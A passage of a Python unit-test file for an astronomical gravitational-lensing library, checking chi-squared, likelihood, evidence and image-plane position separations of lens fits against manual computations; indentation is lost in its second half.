                                           [0.0, 0.0, 0.0]])), pixel_scale=1.0)
            ccd_data = ccd.CCDData(image=np.ones((3, 3)), pixel_scale=1.0, psf=psf, noise_map=np.ones((3, 3)))
            mask = msk.Mask(array=np.array([[True, True, True],
                                            [True, False, True],
                                            [True, True, True]]), pixel_scale=1.0)
            lens_data = ld.LensData(ccd_data=ccd_data, mask=mask, sub_grid_size=1)
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data.grid_stack)
            fit = lens_fit.LensProfileFit(lens_data=lens_data, tracer=tracer)
            # chi^2 = 0, so likelihood = -0.5 * noise normalization for 1 pixel
            assert fit.likelihood == -0.5 * np.log(2 * np.pi * 1.0)

        def test__1x2_image__tracing_fits_data_with_chi_sq_5(self):
            """Residuals of 4 and 3 over two pixels give chi^2 = 16 + 9 = 25."""
            psf = ccd.PSF(array=(np.array([[0.0, 0.0, 0.0],
                                           [0.0, 1.0, 0.0],
                                           [0.0, 0.0, 0.0]])), pixel_scale=1.0)
            ccd_data = ccd.CCDData(5.0 * np.ones((3, 4)), pixel_scale=1.0, psf=psf, noise_map=np.ones((3, 4)))
            ccd_data.image[1,2] = 4.0
            mask = msk.Mask(array=np.array([[True, True, True, True],
                                            [True, False, False, True],
                                            [True, True, True, True]]), pixel_scale=1.0)
            lens_data = ld.LensData(ccd_data=ccd_data, mask=mask, sub_grid_size=1)
            # Setup as a ray trace instance, using a light profile for the lens
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0, size=2))
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data.grid_stack)
            fit = lens_fit.LensProfileFit(lens_data=lens_data, tracer=tracer)
            assert fit.chi_squared == 25.0
            assert fit.reduced_chi_squared == 25.0 / 2.0
            assert fit.likelihood == -0.5 * (25.0 + 2.0*np.log(2 * np.pi * 1.0))

    class TestCompareToManual:

        def test___manual_image_and_psf(self, lens_data_manual):
            """Recompute every fit quantity by hand with the util/fit_util
            helpers and check each against the LensProfileFit attributes."""
            g0 = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0))
            g1 = g.Galaxy(mass_profile=mp.SphericalIsothermal(einstein_radius=1.0))
            tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g1], source_galaxies=[g0],
                                                         image_plane_grid_stack=lens_data_manual.grid_stack)
            padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g1], source_galaxies=[g0],
                                                                image_plane_grid_stack=lens_data_manual.padded_grid_stack)
            fit = lens_fit.fit_lens_data_with_tracer(lens_data=lens_data_manual, tracer=tracer,
                                                     padded_tracer=padded_tracer)
            assert lens_data_manual.noise_map == pytest.approx(fit.noise_map, 1e-4)
            # model image = PSF-blurred (unblurred + blurring region) image
            model_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
                unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
                convolver=lens_data_manual.convolver_image)
            model_image = lens_data_manual.map_to_scaled_array(array_1d=model_image_1d)
            assert model_image == pytest.approx(fit.model_image, 1e-4)
            # residuals -> chi^2 map -> chi^2 -> likelihood chain
            residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_manual.image,
                                                                               mask=lens_data_manual.mask, model_data=model_image)
            assert residual_map == pytest.approx(fit.residual_map, 1e-4)
            chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
                                                                                            mask=lens_data_manual.mask, noise_map=lens_data_manual.noise_map)
            assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
            chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
                                                                             mask=lens_data_manual.mask)
            noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(noise_map=lens_data_manual.noise_map,
                                                                                       mask=lens_data_manual.mask,)
            likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
                                                                                      noise_normalization=noise_normalization)
            assert likelihood == pytest.approx(fit.likelihood, 1e-4)
            assert likelihood == fit.figure_of_merit
            # per-plane blurred images
            blurred_image_of_planes = util.blurred_image_of_planes_from_1d_images_and_convolver(
                total_planes=tracer.total_planes, image_plane_image_1d_of_planes=tracer.image_plane_image_1d_of_planes,
                image_plane_blurring_image_1d_of_planes=tracer.image_plane_blurring_image_1d_of_planes,
                convolver=lens_data_manual.convolver_image, map_to_scaled_array=lens_data_manual.map_to_scaled_array)
            assert (blurred_image_of_planes[0] == fit.model_image_of_planes[0]).all()
            assert (blurred_image_of_planes[1] == fit.model_image_of_planes[1]).all()
            # unmasked (padded) model images: total, per plane, per galaxy
            unmasked_blurred_image = \
                util.unmasked_blurred_image_from_padded_grid_stack_psf_and_unmasked_image(
                    padded_grid_stack=lens_data_manual.padded_grid_stack, psf=lens_data_manual.psf,
                    unmasked_image_1d=padded_tracer.image_plane_image_1d)
            assert (unmasked_blurred_image == fit.unmasked_model_image).all()
            unmasked_blurred_image_of_planes = \
                util.unmasked_blurred_image_of_planes_from_padded_grid_stack_and_psf(
                    planes=padded_tracer.planes, padded_grid_stack=lens_data_manual.padded_grid_stack, psf=lens_data_manual.psf)
            assert (unmasked_blurred_image_of_planes[0] == fit.unmasked_model_image_of_planes[0]).all()
            assert (unmasked_blurred_image_of_planes[1] == fit.unmasked_model_image_of_planes[1]).all()
            unmasked_blurred_image_of_galaxies = \
                util.unmasked_blurred_image_of_planes_and_galaxies_from_padded_grid_stack_and_psf(
                    planes=padded_tracer.planes, padded_grid_stack=lens_data_manual.padded_grid_stack, psf=lens_data_manual.psf)
            assert (unmasked_blurred_image_of_galaxies[0][0] == fit.unmasked_model_image_of_planes_and_galaxies[0][0]).all()
            assert (unmasked_blurred_image_of_galaxies[1][0] == fit.unmasked_model_image_of_planes_and_galaxies[1][0]).all()
class TestLensInversionFit:
    """End-to-end comparison of lens_fit.LensInversionFit with a manual
    inversion computation."""

    class TestCompareToManual:

        def test___manual_image_and_psf(self, lens_data_manual):
            """Recompute the inversion and every derived statistic by hand."""
            pix = pixelizations.Rectangular(shape=(3, 3))
            reg = regularization.Constant(coefficients=(1.0,))
            g0 = g.Galaxy(pixelization=pix, regularization=reg)
            tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g.Galaxy()], source_galaxies=[g0],
                                                         image_plane_grid_stack=lens_data_manual.grid_stack, border=None)
            fit = lens_fit.fit_lens_data_with_tracer(lens_data=lens_data_manual, tracer=tracer)
            # manual inversion of the full image
            mapper = pix.mapper_from_grid_stack_and_border(grid_stack=lens_data_manual.grid_stack, border=None)
            inversion = inversions.inversion_from_image_mapper_and_regularization(mapper=mapper,
                regularization=reg, image_1d=lens_data_manual.image_1d, noise_map_1d=lens_data_manual.noise_map_1d,
                convolver=lens_data_manual.convolver_mapping_matrix)
            assert inversion.reconstructed_data == pytest.approx(fit.model_image, 1e-4)
            # residuals -> chi^2 -> likelihood / evidence chain
            residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_manual.image,
                                                                               mask=lens_data_manual.mask, model_data=inversion.reconstructed_data)
            assert residual_map == pytest.approx(fit.residual_map, 1e-4)
            chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
                                                                                            mask=lens_data_manual.mask, noise_map=lens_data_manual.noise_map)
            assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
            chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
                                                                             mask=lens_data_manual.mask)
            noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(mask=lens_data_manual.mask,
                                                                                       noise_map=lens_data_manual.noise_map)
            likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
                                                                                      noise_normalization=noise_normalization)
            assert likelihood == pytest.approx(fit.likelihood, 1e-4)
            likelihood_with_regularization = \
                util.likelihood_with_regularization_from_chi_squared_regularization_term_and_noise_normalization(
                    chi_squared=chi_squared, regularization_term=inversion.regularization_term,
                    noise_normalization=noise_normalization)
            assert likelihood_with_regularization == pytest.approx(fit.likelihood_with_regularization, 1e-4)
            evidence = util.evidence_from_inversion_terms(chi_squared=chi_squared,
                                                          regularization_term=inversion.regularization_term,
                                                          log_curvature_regularization_term=inversion.log_det_curvature_reg_matrix_term,
                                                          log_regularization_term=inversion.log_det_regularization_matrix_term, noise_normalization=noise_normalization)
            assert evidence == fit.evidence
            assert evidence == fit.figure_of_merit
class TestLensProfileInversionFit:
    """End-to-end comparison of lens_fit.LensProfileInversionFit (profile
    plus inversion) with a manual computation of both components."""

    class TestCompareToManual:

        def test___manual_image_and_psf(self, lens_data_manual):
            """Recompute the blurred profile image, the inversion of the
            profile-subtracted image, and every derived statistic by hand."""
            galaxy_light = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0))
            pix = pixelizations.Rectangular(shape=(3, 3))
            reg = regularization.Constant(coefficients=(1.0,))
            galaxy_pix = g.Galaxy(pixelization=pix, regularization=reg)
            tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[galaxy_light], source_galaxies=[galaxy_pix],
                                                         image_plane_grid_stack=lens_data_manual.grid_stack, border=None)
            fit = lens_fit.fit_lens_data_with_tracer(lens_data=lens_data_manual, tracer=tracer)
            # manual blurred profile image
            blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
                unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
                convolver=lens_data_manual.convolver_image)
            blurred_profile_image = lens_data_manual.map_to_scaled_array(array_1d=blurred_profile_image_1d)
            assert blurred_profile_image == pytest.approx(fit.blurred_profile_image, 1e-4)
            profile_subtracted_image = lens_data_manual.image - blurred_profile_image
            assert profile_subtracted_image == pytest.approx(fit.profile_subtracted_image)
            # manual inversion of the profile-subtracted image
            blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
                unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
                convolver=lens_data_manual.convolver_image)
            profile_subtracted_image_1d = lens_data_manual.image_1d - blurred_profile_image_1d
            mapper = pix.mapper_from_grid_stack_and_border(grid_stack=lens_data_manual.grid_stack, border=None)
            inversion = inversions.inversion_from_image_mapper_and_regularization(
                image_1d=profile_subtracted_image_1d, noise_map_1d=lens_data_manual.noise_map_1d,
                convolver=lens_data_manual.convolver_mapping_matrix, mapper=mapper, regularization=reg)
            # total model = profile + reconstruction
            model_image = blurred_profile_image + inversion.reconstructed_data
            assert model_image == pytest.approx(fit.model_image, 1e-4)
            # residuals -> chi^2 -> likelihood / evidence chain
            residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_manual.image,
                                                                               mask=lens_data_manual.mask, model_data=model_image)
            assert residual_map == pytest.approx(fit.residual_map, 1e-4)
            chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
                                                                                            mask=lens_data_manual.mask, noise_map=lens_data_manual.noise_map)
            assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
            chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
                                                                             mask=lens_data_manual.mask)
            noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(mask=lens_data_manual.mask,
                                                                                       noise_map=lens_data_manual.noise_map)
            likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
                                                                                      noise_normalization=noise_normalization)
            assert likelihood == pytest.approx(fit.likelihood, 1e-4)
            likelihood_with_regularization = \
                util.likelihood_with_regularization_from_chi_squared_regularization_term_and_noise_normalization(
                    chi_squared=chi_squared, regularization_term=inversion.regularization_term,
                    noise_normalization=noise_normalization)
            assert likelihood_with_regularization == pytest.approx(fit.likelihood_with_regularization, 1e-4)
            evidence = util.evidence_from_inversion_terms(chi_squared=chi_squared,
                                                          regularization_term=inversion.regularization_term,
                                                          log_curvature_regularization_term=inversion.log_det_curvature_reg_matrix_term,
                                                          log_regularization_term=inversion.log_det_regularization_matrix_term, noise_normalization=noise_normalization)
            assert evidence == fit.evidence
            assert evidence == fit.figure_of_merit
class TestLensProfileHyperFit:
class TestLikelihood:
def test__hyper_galaxy_adds_to_noise_normalization__chi_squared_is_0(self, lens_data_hyper_no_blur):
# Setup as a ray trace instance, using a light profile for the lens
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0, size=4))
g1 = g.Galaxy(light_profile=MockLightProfile(value=0.0, size=4))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0, g1],
image_plane_grid_stack=lens_data_hyper_no_blur.grid_stack)
lens_data_hyper_no_blur.hyper_model_image_1d = np.array([1.0, 1.0, 1.0, 1.0])
lens_data_hyper_no_blur.hyper_galaxy_images_1d = [np.array([1.0, 1.0, 1.0, 1.0]),
np.array([1.0, 1.0, 1.0, 1.0])]
tracer.image_plane.galaxies[0].hyper_galaxy = MockHyperGalaxy(contribution_factor=0.0, noise_factor=1.0,
noise_power=1.0)
tracer.image_plane.galaxies[1].hyper_galaxy = MockHyperGalaxy(contribution_factor=0.0, noise_factor=2.0,
noise_power=1.0)
fit = lens_fit.LensProfileHyperFit(lens_data_hyper=lens_data_hyper_no_blur, tracer=tracer)
chi_squared = 0.0
noise_normalization = 4.0 * np.log(2 * np.pi * 4.0 ** 2.0)
assert fit.likelihood == -0.5 * (chi_squared + noise_normalization)
def test__hyper_galaxy_adds_to_noise_normalization_for_scaled_noise__chi_squared_nonzero(self,
lens_data_hyper_no_blur):
lens_data_hyper_no_blur.image[1:3,1:3] = 2.0
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0, size=4))
g1 = g.Galaxy(light_profile=MockLightProfile(value=0.0, size=4))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0, g1],
image_plane_grid_stack=lens_data_hyper_no_blur.grid_stack)
lens_data_hyper_no_blur.hyper_model_image_1d = np.array([1.0, 1.0, 1.0, 1.0])
lens_data_hyper_no_blur.hyper_galaxy_images_1d = [np.array([1.0, 1.0, 1.0, 1.0]),
np.array([1.0, 1.0, 1.0, 1.0])]
tracer.image_plane.galaxies[0].hyper_galaxy = MockHyperGalaxy(contribution_factor=0.0, noise_factor=1.0,
noise_power=1.0)
tracer.image_plane.galaxies[1].hyper_galaxy = MockHyperGalaxy(contribution_factor=0.0, noise_factor=2.0,
noise_power=1.0)
fit = lens_fit.LensProfileHyperFit(lens_data_hyper=lens_data_hyper_no_blur, tracer=tracer)
chi_squared = 4.0 * (1.0 / (4.0)) ** 2.0
noise_normalization = 4.0 * np.log(2 * np.pi * 4.0 ** 2.0)
assert fit.likelihood == -0.5 * (chi_squared + noise_normalization)
class TestCompareToManual:
def test___manual_image_and_psf(self, lens_data_hyper_manual):
hyper_galaxy = g.HyperGalaxy(contribution_factor=4.0, noise_factor=2.0, noise_power=3.0)
g0 = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0), hyper_galaxy=hyper_galaxy)
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0], source_galaxies=[g0],
image_plane_grid_stack=lens_data_hyper_manual.grid_stack)
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0], source_galaxies=[g0],
image_plane_grid_stack=lens_data_hyper_manual.padded_grid_stack)
fit = lens_fit.hyper_fit_lens_data_with_tracer(lens_data_hyper=lens_data_hyper_manual, tracer=tracer,
padded_tracer=padded_tracer)
contributions_1d = util.contribution_maps_1d_from_hyper_images_and_galaxies(
hyper_model_image_1d=lens_data_hyper_manual.hyper_model_image_1d,
hyper_galaxy_images_1d=lens_data_hyper_manual.hyper_galaxy_images_1d,
hyper_galaxies=tracer.hyper_galaxies, hyper_minimum_values=lens_data_hyper_manual.hyper_minimum_values)
contribution_maps = list(map(lambda contribution_1d :
lens_data_hyper_manual.map_to_scaled_array(array_1d=contribution_1d),
contributions_1d))
assert contribution_maps[0] == pytest.approx(fit.contribution_maps[0], 1.0e-4)
hyper_noise_map_1d = util.scaled_noise_map_from_hyper_galaxies_and_contribution_maps(
contribution_maps=contributions_1d, hyper_galaxies=tracer.hyper_galaxies,
noise_map=lens_data_hyper_manual.noise_map_1d)
hyper_noise_map = lens_data_hyper_manual.map_to_scaled_array(array_1d=hyper_noise_map_1d)
assert hyper_noise_map == pytest.approx(fit.noise_map, 1.0e-4)
model_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_hyper_manual.convolver_image)
model_image = lens_data_hyper_manual.map_to_scaled_array(array_1d=model_image_1d)
assert model_image == pytest.approx(fit.model_image, 1e-4)
residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_hyper_manual.image,
mask=lens_data_hyper_manual.mask,
model_data=model_image)
assert residual_map == pytest.approx(fit.residual_map, 1e-4)
chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
mask=lens_data_hyper_manual.mask, noise_map=hyper_noise_map)
assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
mask=lens_data_hyper_manual.mask)
noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(mask=lens_data_hyper_manual.mask,
noise_map=lens_data_hyper_manual.noise_map)
likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
noise_normalization=noise_normalization)
assert likelihood == pytest.approx(fit.figure_of_merit, 1e-4)
assert likelihood == pytest.approx(fit.figure_of_merit, 1e-4)
blurred_image_of_planes = util.blurred_image_of_planes_from_1d_images_and_convolver(
total_planes=tracer.total_planes, image_plane_image_1d_of_planes=tracer.image_plane_image_1d_of_planes,
image_plane_blurring_image_1d_of_planes=tracer.image_plane_blurring_image_1d_of_planes,
convolver=lens_data_hyper_manual.convolver_image,
map_to_scaled_array=lens_data_hyper_manual.map_to_scaled_array)
assert (blurred_image_of_planes[0] == fit.model_image_of_planes[0]).all()
assert (blurred_image_of_planes[1] == fit.model_image_of_planes[1]).all()
unmasked_blurred_image = \
util.unmasked_blurred_image_from_padded_grid_stack_psf_and_unmasked_image(
padded_grid_stack=lens_data_hyper_manual.padded_grid_stack, psf=lens_data_hyper_manual.psf,
unmasked_image_1d=padded_tracer.image_plane_image_1d)
assert (unmasked_blurred_image == fit.unmasked_model_image).all()
unmasked_blurred_image_of_planes = \
util.unmasked_blurred_image_of_planes_from_padded_grid_stack_and_psf(
planes=padded_tracer.planes, padded_grid_stack=lens_data_hyper_manual.padded_grid_stack,
psf=lens_data_hyper_manual.psf)
assert (unmasked_blurred_image_of_planes[0] == fit.unmasked_model_image_of_planes[0]).all()
assert (unmasked_blurred_image_of_planes[1] == fit.unmasked_model_image_of_planes[1]).all()
unmasked_blurred_image_of_galaxies = \
util.unmasked_blurred_image_of_planes_and_galaxies_from_padded_grid_stack_and_psf(
planes=padded_tracer.planes, padded_grid_stack=lens_data_hyper_manual.padded_grid_stack,
psf=lens_data_hyper_manual.psf)
assert (unmasked_blurred_image_of_galaxies[0][0] == fit.unmasked_model_image_of_planes_and_galaxies[0][0]).all()
assert (unmasked_blurred_image_of_galaxies[1][0] == fit.unmasked_model_image_of_planes_and_galaxies[1][0]).all()
class TestLensInversionHyperFit:
class TestCompareToManual:
def test___manual_image_and_psf(self, lens_data_hyper_manual):
pix = pixelizations.Rectangular(shape=(3, 3))
mapper = pix.mapper_from_grid_stack_and_border(grid_stack=lens_data_hyper_manual.grid_stack,
border=lens_data_hyper_manual.border)
reg = regularization.Constant(coefficients=(1.0,))
hyper_galaxy = g.HyperGalaxy(contribution_factor=4.0, noise_factor=2.0, noise_power=3.0)
hyp_galaxy = g.Galaxy(hyper_galaxy=hyper_galaxy)
inv_galaxy = g.Galaxy(pixelization=pix, regularization=reg)
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[hyp_galaxy, hyp_galaxy],
source_galaxies=[inv_galaxy],
image_plane_grid_stack=lens_data_hyper_manual.grid_stack,
border=None)
fit = lens_fit.hyper_fit_lens_data_with_tracer(lens_data_hyper=lens_data_hyper_manual, tracer=tracer)
contributions_1d = util.contribution_maps_1d_from_hyper_images_and_galaxies(
hyper_model_image_1d=lens_data_hyper_manual.hyper_model_image_1d,
hyper_galaxy_images_1d=lens_data_hyper_manual.hyper_galaxy_images_1d,
hyper_galaxies=tracer.hyper_galaxies, hyper_minimum_values=lens_data_hyper_manual.hyper_minimum_values)
contribution_maps = list(map(lambda contribution_1d:
lens_data_hyper_manual.map_to_scaled_array(array_1d=contribution_1d),
contributions_1d))
assert contribution_maps[0] == pytest.approx(fit.contribution_maps[0], 1.0e-4)
hyper_noise_map_1d = util.scaled_noise_map_from_hyper_galaxies_and_contribution_maps(
contribution_maps=contributions_1d, hyper_galaxies=tracer.hyper_galaxies,
noise_map=lens_data_hyper_manual.noise_map_1d)
hyper_noise_map = lens_data_hyper_manual.map_to_scaled_array(array_1d=hyper_noise_map_1d)
assert hyper_noise_map == pytest.approx(fit.noise_map, 1.0e-4)
inversion = inversions.inversion_from_image_mapper_and_regularization(mapper=mapper,
regularization=reg, image_1d=lens_data_hyper_manual.image_1d, noise_map_1d=hyper_noise_map_1d,
convolver=lens_data_hyper_manual.convolver_mapping_matrix)
assert inversion.reconstructed_data == pytest.approx(fit.model_image, 1e-4)
residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_hyper_manual.image,
mask=lens_data_hyper_manual.mask, model_data=inversion.reconstructed_data)
assert residual_map == pytest.approx(fit.residual_map, 1e-4)
chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
mask=lens_data_hyper_manual.mask, noise_map=hyper_noise_map)
assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
mask=lens_data_hyper_manual.mask)
noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(mask=lens_data_hyper_manual.mask,
noise_map=hyper_noise_map)
likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
noise_normalization=noise_normalization)
assert likelihood == pytest.approx(fit.likelihood, 1e-4)
likelihood_with_regularization = \
util.likelihood_with_regularization_from_chi_squared_regularization_term_and_noise_normalization(
chi_squared=chi_squared, regularization_term=inversion.regularization_term,
noise_normalization=noise_normalization)
assert likelihood_with_regularization == pytest.approx(fit.likelihood_with_regularization, 1e-4)
evidence = util.evidence_from_inversion_terms(chi_squared=chi_squared,
regularization_term=inversion.regularization_term,
log_curvature_regularization_term=inversion.log_det_curvature_reg_matrix_term,
log_regularization_term=inversion.log_det_regularization_matrix_term, noise_normalization=noise_normalization)
assert evidence == fit.evidence
assert evidence == fit.figure_of_merit
class TestLensProfileInversionHyperFit:
class TestCompareToManual:
def test___manual_image_and_psf(self, lens_data_hyper_manual):
pix = pixelizations.Rectangular(shape=(3, 3))
mapper = pix.mapper_from_grid_stack_and_border(grid_stack=lens_data_hyper_manual.grid_stack,
border=lens_data_hyper_manual.border)
reg = regularization.Constant(coefficients=(1.0,))
hyper_galaxy = g.HyperGalaxy(contribution_factor=4.0, noise_factor=2.0, noise_power=3.0)
hyp_galaxy = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0), hyper_galaxy=hyper_galaxy)
inv_galaxy = g.Galaxy(pixelization=pix, regularization=reg)
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[hyp_galaxy, hyp_galaxy],
source_galaxies=[inv_galaxy],
image_plane_grid_stack=lens_data_hyper_manual.grid_stack,
border=None)
fit = lens_fit.hyper_fit_lens_data_with_tracer(lens_data_hyper=lens_data_hyper_manual, tracer=tracer)
contributions_1d = util.contribution_maps_1d_from_hyper_images_and_galaxies(
hyper_model_image_1d=lens_data_hyper_manual.hyper_model_image_1d,
hyper_galaxy_images_1d=lens_data_hyper_manual.hyper_galaxy_images_1d,
hyper_galaxies=tracer.hyper_galaxies, hyper_minimum_values=lens_data_hyper_manual.hyper_minimum_values)
contribution_maps = list(map(lambda contribution_1d:
lens_data_hyper_manual.map_to_scaled_array(array_1d=contribution_1d),
contributions_1d))
assert contribution_maps[0] == pytest.approx(fit.contribution_maps[0], 1.0e-4)
hyper_noise_map_1d = util.scaled_noise_map_from_hyper_galaxies_and_contribution_maps(
contribution_maps=contributions_1d, hyper_galaxies=tracer.hyper_galaxies,
noise_map=lens_data_hyper_manual.noise_map_1d)
hyper_noise_map = lens_data_hyper_manual.map_to_scaled_array(array_1d=hyper_noise_map_1d)
assert hyper_noise_map == pytest.approx(fit.noise_map, 1.0e-4)
blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_hyper_manual.convolver_image)
blurred_profile_image = lens_data_hyper_manual.map_to_scaled_array(array_1d=blurred_profile_image_1d)
assert blurred_profile_image == pytest.approx(fit.blurred_profile_image, 1e-4)
profile_subtracted_image = lens_data_hyper_manual.image - blurred_profile_image
assert profile_subtracted_image == pytest.approx(fit.profile_subtracted_image)
blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_hyper_manual.convolver_image)
profile_subtracted_image_1d = lens_data_hyper_manual.image_1d - blurred_profile_image_1d
inversion = inversions.inversion_from_image_mapper_and_regularization(
image_1d=profile_subtracted_image_1d, noise_map_1d=hyper_noise_map_1d,
convolver=lens_data_hyper_manual.convolver_mapping_matrix, mapper=mapper, regularization=reg)
model_image = blurred_profile_image + inversion.reconstructed_data
assert model_image == pytest.approx(fit.model_image, 1e-4)
residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_hyper_manual.image,
mask=lens_data_hyper_manual.mask,
model_data=model_image)
assert residual_map == pytest.approx(fit.residual_map, 1e-4)
chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
mask=lens_data_hyper_manual.mask, noise_map=hyper_noise_map)
assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
mask=lens_data_hyper_manual.mask)
noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(noise_map=hyper_noise_map,
mask=lens_data_hyper_manual.mask)
likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
noise_normalization=noise_normalization)
assert likelihood == pytest.approx(fit.likelihood, 1e-4)
likelihood_with_regularization = \
util.likelihood_with_regularization_from_chi_squared_regularization_term_and_noise_normalization(
chi_squared=chi_squared, regularization_term=inversion.regularization_term,
noise_normalization=noise_normalization)
assert likelihood_with_regularization == pytest.approx(fit.likelihood_with_regularization, 1e-4)
evidence = util.evidence_from_inversion_terms(chi_squared=chi_squared,
regularization_term=inversion.regularization_term,
log_curvature_regularization_term=inversion.log_det_curvature_reg_matrix_term,
log_regularization_term=inversion.log_det_regularization_matrix_term,
noise_normalization=noise_normalization)
assert evidence == fit.evidence
assert evidence == fit.figure_of_merit
class MockTracerPositions:
def __init__(self, positions, noise=None):
self.positions = positions
self.noise = noise
class TestPositionFit:
def test__x1_positions__mock_position_tracer__maximum_separation_is_correct(self):
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 1.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == 1.0
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [1.0, 1.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(2)
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [1.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(np.square(1.0) + np.square(3.0))
tracer = MockTracerPositions(positions=[np.array([[-2.0, -4.0], [1.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(np.square(3.0) + np.square(7.0))
tracer = MockTracerPositions(positions=[np.array([[8.0, 4.0], [-9.0, -4.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(np.square(17.0) + np.square(8.0))
def test_multiple_positions__mock_position_tracer__maximum_separation_is_correct(self):
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 1.0], [0.0, 0.5]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == 1.0
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 0.0], [3.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(18)
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [1.0, 1.0], [3.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(18)
